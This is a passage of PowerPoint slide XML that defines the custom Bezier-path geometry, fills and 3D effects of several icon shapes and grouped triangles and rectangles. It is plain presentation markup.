                    <a:gd name="T3" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T4" fmla="+- 0 10801 59"/>
                    <a:gd name="T5" fmla="*/ T4 w 21484"/>
                    <a:gd name="T6" fmla="+- 0 10799 41"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T8" fmla="+- 0 10801 59"/>
                    <a:gd name="T9" fmla="*/ T8 w 21484"/>
                    <a:gd name="T10" fmla="+- 0 10799 41"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T12" fmla="+- 0 10801 59"/>
                    <a:gd name="T13" fmla="*/ T12 w 21484"/>
                    <a:gd name="T14" fmla="+- 0 10799 41"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21516"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21484" h="21516">
                      <a:moveTo>
                        <a:pt x="17511" y="14987"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17287" y="15384"/>
                        <a:pt x="17032" y="15740"/>
                        <a:pt x="16731" y="16049"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15340" y="14692"/>
                        <a:pt x="13947" y="13205"/>
                        <a:pt x="12559" y="11675"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12912" y="11521"/>
                        <a:pt x="13287" y="11362"/>
                        <a:pt x="13689" y="11198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14092" y="11034"/>
                        <a:pt x="14494" y="10927"/>
                        <a:pt x="14895" y="10861"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15308" y="10801"/>
                        <a:pt x="15715" y="10819"/>
                        <a:pt x="16122" y="10913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16527" y="11011"/>
                        <a:pt x="16909" y="11222"/>
                        <a:pt x="17262" y="11554"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17612" y="11890"/>
                        <a:pt x="17835" y="12244"/>
                        <a:pt x="17923" y="12620"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18020" y="13004"/>
                        <a:pt x="18025" y="13392"/>
                        <a:pt x="17958" y="13789"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17883" y="14187"/>
                        <a:pt x="17738" y="14585"/>
                        <a:pt x="17511" y="14987"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="5799" y="10193"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5096" y="10221"/>
                        <a:pt x="4482" y="9996"/>
                        <a:pt x="3946" y="9496"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3717" y="9285"/>
                        <a:pt x="3558" y="9028"/>
                        <a:pt x="3461" y="8724"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3359" y="8420"/>
                        <a:pt x="3326" y="8088"/>
                        <a:pt x="3366" y="7723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3397" y="7363"/>
                        <a:pt x="3509" y="6989"/>
                        <a:pt x="3703" y="6610"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3889" y="6231"/>
                        <a:pt x="4160" y="5852"/>
                        <a:pt x="4510" y="5487"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5768" y="6694"/>
                        <a:pt x="7022" y="8018"/>
                        <a:pt x="8282" y="9388"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7330" y="9893"/>
                        <a:pt x="6501" y="10164"/>
                        <a:pt x="5799" y="10193"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="19678" y="8570"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18868" y="7915"/>
                        <a:pt x="18055" y="7470"/>
                        <a:pt x="17235" y="7250"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16421" y="7031"/>
                        <a:pt x="15603" y="6942"/>
                        <a:pt x="14779" y="6998"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13964" y="7059"/>
                        <a:pt x="13130" y="7236"/>
                        <a:pt x="12296" y="7545"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11462" y="7859"/>
                        <a:pt x="10625" y="8200"/>
                        <a:pt x="9782" y="8593"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8448" y="7115"/>
                        <a:pt x="7114" y="5658"/>
                        <a:pt x="5778" y="4299"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6382" y="3775"/>
                        <a:pt x="6963" y="3509"/>
                        <a:pt x="7526" y="3490"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8088" y="3467"/>
                        <a:pt x="8631" y="3523"/>
                        <a:pt x="9145" y="3649"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9669" y="3775"/>
                        <a:pt x="10149" y="3883"/>
                        <a:pt x="10590" y="3967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11038" y="4051"/>
                        <a:pt x="11424" y="3958"/>
                        <a:pt x="11765" y="3682"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12123" y="3382"/>
                        <a:pt x="12321" y="2994"/>
                        <a:pt x="12351" y="2526"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12376" y="2054"/>
                        <a:pt x="12189" y="1596"/>
                        <a:pt x="11782" y="1147"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11258" y="569"/>
                        <a:pt x="10630" y="216"/>
                        <a:pt x="9872" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9126" y="-41"/>
                        <a:pt x="8358" y="-30"/>
                        <a:pt x="7564" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6780" y="309"/>
                        <a:pt x="6032" y="595"/>
                        <a:pt x="5324" y="997"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4617" y="1399"/>
                        <a:pt x="4048" y="1811"/>
                        <a:pt x="3626" y="2213"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3464" y="2066"/>
                        <a:pt x="3302" y="1918"/>
                        <a:pt x="3141" y="1773"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2963" y="1614"/>
                        <a:pt x="2739" y="1530"/>
                        <a:pt x="2471" y="1535"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2200" y="1535"/>
                        <a:pt x="1977" y="1647"/>
                        <a:pt x="1793" y="1853"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1615" y="2054"/>
                        <a:pt x="1530" y="2288"/>
                        <a:pt x="1565" y="2536"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1589" y="2793"/>
                        <a:pt x="1696" y="2989"/>
                        <a:pt x="1880" y="3139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2044" y="3270"/>
                        <a:pt x="2203" y="3401"/>
                        <a:pt x="2364" y="3537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1731" y="4276"/>
                        <a:pt x="1207" y="5094"/>
                        <a:pt x="795" y="5957"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="378" y="6820"/>
                        <a:pt x="130" y="7676"/>
                        <a:pt x="37" y="8509"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-59" y="9346"/>
                        <a:pt x="33" y="10113"/>
                        <a:pt x="298" y="10824"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="566" y="11540"/>
                        <a:pt x="1056" y="12148"/>
                        <a:pt x="1774" y="12723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2942" y="13658"/>
                        <a:pt x="4321" y="14056"/>
                        <a:pt x="5915" y="13967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7507" y="13874"/>
                        <a:pt x="9223" y="13415"/>
                        <a:pt x="11064" y="12461"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12532" y="14093"/>
                        <a:pt x="14002" y="15716"/>
                        <a:pt x="15470" y="17223"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14849" y="17728"/>
                        <a:pt x="14305" y="18018"/>
                        <a:pt x="13826" y="18111"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13344" y="18210"/>
                        <a:pt x="12917" y="18200"/>
                        <a:pt x="12530" y="18088"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12142" y="17971"/>
                        <a:pt x="11782" y="17803"/>
                        <a:pt x="11455" y="17587"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11125" y="17368"/>
                        <a:pt x="10799" y="17181"/>
                        <a:pt x="10474" y="17026"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10154" y="16872"/>
                        <a:pt x="9823" y="16788"/>
                        <a:pt x="9486" y="16783"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9145" y="16778"/>
                        <a:pt x="8785" y="16937"/>
                        <a:pt x="8388" y="17265"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7981" y="17606"/>
                        <a:pt x="7777" y="18004"/>
                        <a:pt x="7777" y="18453"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7777" y="18897"/>
                        <a:pt x="7991" y="19351"/>
                        <a:pt x="8408" y="19809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8830" y="20268"/>
                        <a:pt x="9379" y="20651"/>
                        <a:pt x="10042" y="20955"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10708" y="21259"/>
                        <a:pt x="11455" y="21451"/>
                        <a:pt x="12279" y="21502"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13103" y="21559"/>
                        <a:pt x="13970" y="21437"/>
                        <a:pt x="14886" y="21109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15807" y="20787"/>
                        <a:pt x="16721" y="20202"/>
                        <a:pt x="17617" y="19332"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18051" y="19739"/>
                        <a:pt x="18489" y="20127"/>
                        <a:pt x="18921" y="20501"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19107" y="20656"/>
                        <a:pt x="19328" y="20731"/>
                        <a:pt x="19601" y="20712"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19861" y="20703"/>
                        <a:pt x="20090" y="20586"/>
                        <a:pt x="20269" y="20375"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20455" y="20160"/>
                        <a:pt x="20532" y="19921"/>
                        <a:pt x="20503" y="19674"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20477" y="19421"/>
                        <a:pt x="20371" y="19229"/>
                        <a:pt x="20192" y="19089"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19755" y="18752"/>
                        <a:pt x="19321" y="18397"/>
                        <a:pt x="18884" y="18022"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19626" y="17143"/>
                        <a:pt x="20221" y="16217"/>
                        <a:pt x="20664" y="15300"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21103" y="14379"/>
                        <a:pt x="21367" y="13490"/>
                        <a:pt x="21453" y="12667"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21540" y="11839"/>
                        <a:pt x="21439" y="11091"/>
                        <a:pt x="21159" y="10412"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20880" y="9725"/>
                        <a:pt x="20386" y="9135"/>
                        <a:pt x="19678" y="8570"/>
                      </a:cubicBezTo>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15" name="AutoShape 54"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8375650" y="2896394"/>
                  <a:ext cx="70644" cy="73819"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10791 197"/>
                    <a:gd name="T1" fmla="*/ T0 w 21188"/>
                    <a:gd name="T2" fmla="+- 0 10794 193"/>
                    <a:gd name="T3" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T4" fmla="+- 0 10791 197"/>
                    <a:gd name="T5" fmla="*/ T4 w 21188"/>
                    <a:gd name="T6" fmla="+- 0 10794 193"/>
                    <a:gd name="T7" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T8" fmla="+- 0 10791 197"/>
                    <a:gd name="T9" fmla="*/ T8 w 21188"/>
                    <a:gd name="T10" fmla="+- 0 10794 193"/>
                    <a:gd name="T11" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T12" fmla="+- 0 10791 197"/>
                    <a:gd name="T13" fmla="*/ T12 w 21188"/>
                    <a:gd name="T14" fmla="+- 0 10794 193"/>
                    <a:gd name="T15" fmla="*/ 10794 h 21203"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21188" h="21203">
                      <a:moveTo>
                        <a:pt x="17615" y="468"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17606" y="468"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14870" y="2476"/>
                        <a:pt x="12200" y="4590"/>
                        <a:pt x="9727" y="6958"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7348" y="9227"/>
                        <a:pt x="5200" y="11619"/>
                        <a:pt x="3329" y="14060"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="341" y="17962"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="350" y="17970"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="-197" y="18786"/>
                        <a:pt x="-106" y="19880"/>
                        <a:pt x="638" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1491" y="21407"/>
                        <a:pt x="2889" y="21407"/>
                        <a:pt x="3746" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3877" y="20460"/>
                        <a:pt x="3984" y="20321"/>
                        <a:pt x="4069" y="20174"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6867" y="16517"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8601" y="14255"/>
                        <a:pt x="10606" y="12027"/>
                        <a:pt x="12824" y="9913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15281" y="7570"/>
                        <a:pt x="17557" y="5758"/>
                        <a:pt x="20329" y="3749"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20321" y="3741"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="20400" y="3684"/>
                        <a:pt x="20473" y="3635"/>
                        <a:pt x="20543" y="3570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21402" y="2753"/>
                        <a:pt x="21402" y="1427"/>
                        <a:pt x="20543" y="606"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19742" y="-161"/>
                        <a:pt x="18472" y="-193"/>
                        <a:pt x="17615" y="468"/>
                      </a:cubicBezTo>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16" name="AutoShape 55"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8448675" y="2649538"/>
                  <a:ext cx="71438" cy="74613"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10803 213"/>
                    <a:gd name="T1" fmla="*/ T0 w 21180"/>
                    <a:gd name="T2" fmla="+- 0 10801 203"/>
                    <a:gd name="T3" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T4" fmla="+- 0 10803 213"/>
                    <a:gd name="T5" fmla="*/ T4 w 21180"/>
                    <a:gd name="T6" fmla="+- 0 10801 203"/>
                    <a:gd name="T7" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T8" fmla="+- 0 10803 213"/>
                    <a:gd name="T9" fmla="*/ T8 w 21180"/>
                    <a:gd name="T10" fmla="+- 0 10801 203"/>
                    <a:gd name="T11" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T12" fmla="+- 0 10803 213"/>
                    <a:gd name="T13" fmla="*/ T12 w 21180"/>
                    <a:gd name="T14" fmla="+- 0 10801 203"/>
                    <a:gd name="T15" fmla="*/ 10801 h 21196"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21180" h="21196">
                      <a:moveTo>
                        <a:pt x="8372" y="11356"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6122" y="13508"/>
                        <a:pt x="3675" y="15444"/>
                        <a:pt x="1144" y="17292"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="963" y="17388"/>
                        <a:pt x="786" y="17493"/>
                        <a:pt x="637" y="17645"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-213" y="18457"/>
                        <a:pt x="-213" y="19774"/>
                        <a:pt x="637" y="20585"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1464" y="21380"/>
                        <a:pt x="2796" y="21397"/>
                        <a:pt x="3652" y="20641"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3665" y="20649"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6364" y="18673"/>
                        <a:pt x="8988" y="16581"/>
                        <a:pt x="11419" y="14263"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13759" y="12030"/>
                        <a:pt x="15873" y="9685"/>
                        <a:pt x="17715" y="7283"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20663" y="3427"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20654" y="3419"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21386" y="2600"/>
                        <a:pt x="21357" y="1379"/>
                        <a:pt x="20541" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19697" y="-203"/>
                        <a:pt x="18323" y="-203"/>
                        <a:pt x="17468" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17313" y="760"/>
                        <a:pt x="17197" y="937"/>
                        <a:pt x="17094" y="1114"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="14228" y="4857"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="12526" y="7090"/>
                        <a:pt x="10552" y="9275"/>
                        <a:pt x="8372" y="11356"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5338" y="2772"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="26" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="28" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="30" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="31" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
